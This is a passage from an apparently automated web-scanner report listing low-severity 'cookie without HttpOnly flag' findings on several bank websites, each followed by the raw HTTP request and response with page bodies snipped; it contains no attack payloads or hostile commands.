HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-checking-accounts.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 192
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-checking-accounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /small-business/business-loans.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:12:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//small-business/business-loans.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 180
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//small-business/business-loans.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /spanish/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:53 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 15768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:26 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 27709
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-banking/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:15:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/error.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 138
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-loans/overview.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:16:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://www.citizensbank.com//student-loans/overview.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 173
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.citizensbank.com//student-loans/overview.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-services/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:06 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 26105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /student-services/default.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:14:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:24:05 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 26105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/SiteMap.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:37:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:47:46 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 156512
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tools/leaving.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Length: 0
The following cookies were issued by the application and do not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
HiddenPopup=popup=False; path=/
HiddenError=error=False; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tools/regionalgateway.aspx HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:16:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: HiddenPopup=popup=False; path=/ Set-Cookie: HiddenError=error=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 17174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /trufitstudentloan/ HTTP/1.1 Host: www.charterone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:15:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:25:35 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 46321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:30 GMT Content-length: 22894 Content-type: text/html Set-Cookie: v1st=7623A989437EC784; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Wed, 02 Feb 2011 15:05:03 GMT Etag: "596e-4d49729f" Accept-ranges: bytes Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head> ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /wamuwelcome3/ HTTP/1.1 Host: www.chase.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: JPMC1.0 Date: Wed, 02 Feb 2011 22:00:50 GMT Content-length: 14892 Content-type: text/html Set-Cookie: v1st=60B8BEB245ABF79; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Last-modified: Thu, 06 Jan 2011 22:25:12 GMT Etag: "3a2c-4d264148" Accept-ranges: bytes
The following cookie was issued by the application and does not have the HttpOnly flag set:
ARPT=OVMPLYSbac2dCKIYK; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=OVMPLYSbac2dCKIYK; path=/ Cache-Control: private Content-Length: 68537 Content-Type: text/html; charset=utf-8 X-Powered-By: ASP.NET Set-Cookie: ASP.NET_SessionId=4524pqmzsbws5k55rtryev45; path=/; HttpOnly Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /studentloans HTTP/1.1 Host: www.chasestudentloans.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Length: 169 Content-Type: text/html Location: http://www.chasestudentloans.com/studentloans/ Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5DDC70D33F22CF8D; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chasestudentloans.com Date: Wed, 02 Feb 2011 22:16:37 GMT Connection: close
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://www.chasestudentloans.com/studentloans/">here</a></body>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /401K_notice.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:18:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:28:05 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 5704
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /about-us/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 17629
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /branchlocator/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 27207
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_ ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 02 Feb 2011 22:17:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Set-Cookie: Referrer=url=; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 196
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:14 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 21253
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /careers/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:39:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:49:54 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 19513
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/ HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 32927
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/banking-packages.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 22:17:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=LanguageID=EN&Remember=False; path=/ Cache-Control: public Expires: Wed, 02 Feb 2011 22:27:02 GMT Vary: * Content-Type: text/html; charset=utf-8 Content-Length: 36694
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta id="ctl00_obj ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
Language=LanguageID=EN&Remember=False; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /checking/default.aspx HTTP/1.1 Host: www.citizensbank.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ClrOSSID=1296684060056-10144; ClrCSTO=T; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Response
